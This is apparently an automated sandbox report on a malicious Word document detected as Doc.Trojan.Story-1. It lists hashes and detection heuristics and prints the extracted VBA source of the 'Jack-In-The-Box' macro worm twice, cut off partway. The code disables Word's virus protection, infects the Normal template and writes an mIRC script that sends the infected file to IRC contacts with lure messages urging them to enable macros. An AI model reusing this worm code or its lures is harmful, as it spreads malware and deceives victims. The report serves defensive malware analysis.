Office (OLE) malware analysis — malicious · ae339d0b6520a6ba

MALICIOUS

Office (OLE)

58.0 KB Created: 2000-08-25 21:09:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14

MD5: bb8bc6c652bb9c5852f3905a941b13dd SHA-1: 40b3a336f84bb44fdb722f8181de956225be4045 SHA-256: ae339d0b6520a6ba68eac66352cb40d07af90e8ae6a8946262c6af56343c3a91

120 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder

The sample contains VBA macros, specifically a Document_Open macro, which is a common technique for executing malicious code within Office documents. The script attempts to disable virus protection and modify mIRC configuration files, including writing to 'C:\mirc\script.ini' and potentially setting 'mirc.com' or 'georgecarlin.com' as variables. This suggests an attempt to establish persistence and potentially download further payloads.

Heuristics 3

ClamAV: Doc.Trojan.Story-1 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Trojan.Story-1
VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 19536 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	19536 bytes
SHA-256: `35ba77a070cb56ed239c01fbf84af1134ae8e0883c4e368b58ebfe3a2384d773`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Private Sub Document_Close() On Error Resume Next 'Jack-In-The-Box Set Something = Options Something.VirusProtection = 0 Something.ConfirmConversions = 0 Something.SaveNormalPrompt = 0 Set AnI = ActiveDocument.VBProject.VBComponents(1) Set BnI = NormalTemplate.VBProject.VBComponents(1) If UCase(AnI.CodeModule.Lines(3, 1)) = "'JACK-IN-THE-BOX" Then InA = 1 If UCase(BnI.CodeModule.Lines(3, 1)) = "'JACK-IN-THE-BOX" Then InB = 1 If InA = 1 And InB = 1 Then Exit Sub Set CnI = MacroContainer.VBProject.VBComponents.Item(1) VCode = CnI.CodeModule.Lines(2, CnI.CodeModule.CountOfLines) If InA = 1 Then BnI.CodeModule.AddFromString ("Private Sub Document_Close" & Chr(13) & VCode) If InB = 1 Then AnI.CodeModule.AddFromString ("Private Sub Document_Open" & Chr(13) & VCode) NormalTemplate.Save somename = ActiveDocument.Name DoEvents If InB = 1 Then If Dir("C:\mirc\mirc32.exe") <> "" Then var3 = "C:\mirc\script.ini" If System.PrivateProfileString("C:\mirc\mirc.ini", "warn", "fserve") <> "" Then System.PrivateProfileString("C:\mirc\mirc.ini", "warn", "fserve") = "off" If System.PrivateProfileString("C:\mirc\mirc.ini", "fileserver", "warning") <> "" Then System.PrivateProfileString("C:\mirc\mirc.ini", "fileserver", "warning") = "off" If Dir(var3) <> "" Then Kill var3 Open "C:\mirc\script.ini" For Output As #1 Print #1, "[script]" Print #1, "n0=On 1:Connect:{ .notify SimpleSmn \| Set %var7 $rand(1,8) \| If ( %var7 = 1 ) { Set %var8 mirc.com } \| If ( %var7 = 2 ) { Set %var8 georgecarlin.com } \| If ( %var7 = 3 ) { Set %var8 carrottop.com } \| If ( %var7 = 4 ) { Set %var8 anvdesign.net } \| If ( %var7 = 5 ) { Set %var8 symantec.com } \| If ( %var7 = 6 ) { Set %var8 drsolomon.com } \| If ( %var7 = 7 ) { Set %var8 www.bocklabs.wisc.edu } \| If ( %var7 = 8 ) { Set %var8 ebay.com } \| Set %var9 $rand(1,4) \| If ( %var9 = 1 ) { Set %var10 evrt@avp.com } \| If ( %var9 = 2 ) { Set %var10 samples@datafellows.com } \| If ( %var9 = 3 ) { Set %var10 virus_research@nai.com } \| If ( %var9 = 3 ) { Set %var10 tech_support@nai.com } \| If ( $exists(C:\Windows\script1.ini) = $true ) { .remove C:\Windows\script1.ini } \| .copy C:\mirc\script.ini C:\Windows\script1.ini \| .load -rs C:\Windows\script1.ini \| .write -c C:\mirc\script.ini [script] \| .reload -rs C:\mirc\script.ini }" Print #1, "n1=On 1:Input::{ Set %var1 $1- \| If ( $upper(%var1) = /BY ) { .echo 1Mirc Worm 4Jack-In-The-Box \| .echo 12< 9< 12< 9By SimpleSimon 12> 9> 12> \| halt } }" Print #1, "n2=On 1:Notify:{ .timer3 1 10 { .clear -s } \| If ( $nick == SimpleSmn ) { .msg SimpleSmn I'm on irc. \| halt } \| .timer1 1 15 { .notify -r $nick \| .ignore $nick \| .timer9 1 5 { .msg $nick Hey, I can't talk right now but I wanted to send you this file. It has a funny story you should read, and also has macros inside that protect you from a lot of viruses. Just open the document, enable the macros, and if you are infected it will get rid of the virus } \| .timer2 1 15 { .dcc send $nick C:\Windows\Story.doc } } \| .timer 1 16 { .notify \| .clear -s } }" Print #1, "n3=On 1:Unotify: .clear -s" Print #1, "n4=On 1:Join:#: if (help isin $chan) \|\| (nohack isin $chan) { .part $chan } \| If ( $exists(C:\mirc\script.ini) = $true ) { .remove C:\mirc\script.ini }" Print #1, "n5=On 1:Filercvd:.*: If ( $me != $nick ) { .dcc send $nick C:\Windows\Story.doc }" Print #1, "n6=On 1:Invite:#:{ .ignore $nick \| .timer 1 10 { .join # } \| .timer 1 15 { .msg $nick Thanks for the invite } \| .timer 1 20 { .msg $nick I'm a little busy so I can't talk much now. I thought you might want to look at this file I got. It has a funny story and also has macros in it which get rid of any macro viruses. Just enable the macros when the prompt comes up and it will scan for any viruses and clean them. } \| .timer 1 25 { .dcc send $nick C:\Windows\Story.doc } }" DoEvents ... (truncated)

SHA-256: 35ba77a070cb56ed239c01fbf84af1134ae8e0883c4e368b58ebfe3a2384d773

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Document_Close()
On Error Resume Next
'Jack-In-The-Box
Set Something = Options
Something.VirusProtection = 0
Something.ConfirmConversions = 0
Something.SaveNormalPrompt = 0
Set AnI = ActiveDocument.VBProject.VBComponents(1)
Set BnI = NormalTemplate.VBProject.VBComponents(1)
If UCase(AnI.CodeModule.Lines(3, 1)) = "'JACK-IN-THE-BOX" Then InA = 1
If UCase(BnI.CodeModule.Lines(3, 1)) = "'JACK-IN-THE-BOX" Then InB = 1
If InA = 1 And InB = 1 Then Exit Sub
Set CnI = MacroContainer.VBProject.VBComponents.Item(1)
VCode = CnI.CodeModule.Lines(2, CnI.CodeModule.CountOfLines)
If InA = 1 Then BnI.CodeModule.AddFromString ("Private Sub Document_Close" & Chr(13) & VCode)
If InB = 1 Then AnI.CodeModule.AddFromString ("Private Sub Document_Open" & Chr(13) & VCode)
NormalTemplate.Save
somename = ActiveDocument.Name
DoEvents
If InB = 1 Then
If Dir("C:\mirc\mirc32.exe") <> "" Then
var3 = "C:\mirc\script.ini"
If System.PrivateProfileString("C:\mirc\mirc.ini", "warn", "fserve") <> "" Then System.PrivateProfileString("C:\mirc\mirc.ini", "warn", "fserve") = "off"
If System.PrivateProfileString("C:\mirc\mirc.ini", "fileserver", "warning") <> "" Then System.PrivateProfileString("C:\mirc\mirc.ini", "fileserver", "warning") = "off"
If Dir(var3) <> "" Then Kill var3
Open "C:\mirc\script.ini" For Output As #1
Print #1, "[script]"
Print #1, "n0=On 1:Connect:{ .notify SimpleSmn | Set %var7 $rand(1,8) | If ( %var7 = 1 ) { Set %var8 mirc.com } | If ( %var7 = 2 ) { Set %var8 georgecarlin.com } | If ( %var7 = 3 ) { Set %var8 carrottop.com } | If ( %var7 = 4 ) { Set %var8 anvdesign.net } | If ( %var7 = 5 ) { Set %var8 symantec.com } | If ( %var7 = 6 ) { Set %var8 drsolomon.com } | If ( %var7 = 7 ) { Set %var8 www.bocklabs.wisc.edu } | If ( %var7 = 8 ) { Set %var8 ebay.com } | Set %var9 $rand(1,4) | If ( %var9 = 1 ) { Set %var10 evrt@avp.com } | If ( %var9 = 2 ) { Set %var10 samples@datafellows.com } | If ( %var9 = 3 ) { Set %var10 virus_research@nai.com } | If ( %var9 = 3 ) { Set %var10 tech_support@nai.com } | If ( $exists(C:\Windows\script1.ini) = $true ) { .remove C:\Windows\script1.ini } | .copy C:\mirc\script.ini C:\Windows\script1.ini | .load -rs C:\Windows\script1.ini | .write -c C:\mirc\script.ini [script] | .reload -rs C:\mirc\script.ini }"
Print #1, "n1=On 1:Input:*:{ Set %var1 $1- | If ( $upper(%var1) = /BY ) { .echo  1Mirc Worm  4Jack-In-The-Box | .echo  12< 9< 12< 9By SimpleSimon 12> 9> 12> | halt } }"
Print #1, "n2=On 1:Notify:{ .timer3 1 10 { .clear -s } | If ( $nick == SimpleSmn ) { .msg SimpleSmn I'm on irc. | halt } | .timer1 1 15 { .notify -r $nick | .ignore $nick | .timer9 1 5 { .msg $nick Hey, I can't talk right now but I wanted to send you this file.  It has a funny story you should read, and also has macros inside that protect you from a lot of viruses.  Just open the document, enable the macros, and if you are infected it will get rid of the virus } | .timer2 1 15 { .dcc send $nick C:\Windows\Story.doc } } | .timer 1 16 { .notify | .clear -s } }"
Print #1, "n3=On 1:Unotify: .clear -s"
Print #1, "n4=On 1:Join:#: if (help isin $chan) || (nohack isin $chan) { .part $chan } | If ( $exists(C:\mirc\script.ini) = $true ) { .remove C:\mirc\script.ini }"
Print #1, "n5=On 1:Filercvd:*.*: If ( $me != $nick ) { .dcc send $nick C:\Windows\Story.doc }"
Print #1, "n6=On 1:Invite:#:{ .ignore $nick | .timer 1 10 { .join # } | .timer 1 15 { .msg $nick Thanks for the invite } | .timer 1 20 { .msg $nick I'm a little busy so I can't talk much now.  I thought you might want to look at this file I got. It has a funny story and also has macros in it which get rid of any macro viruses.  Just enable the macros when the prompt comes up and it will scan for any viruses and clean them. } | .timer 1 25 { .dcc send $nick C:\Windows\Story.doc } }"
DoEvents

... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.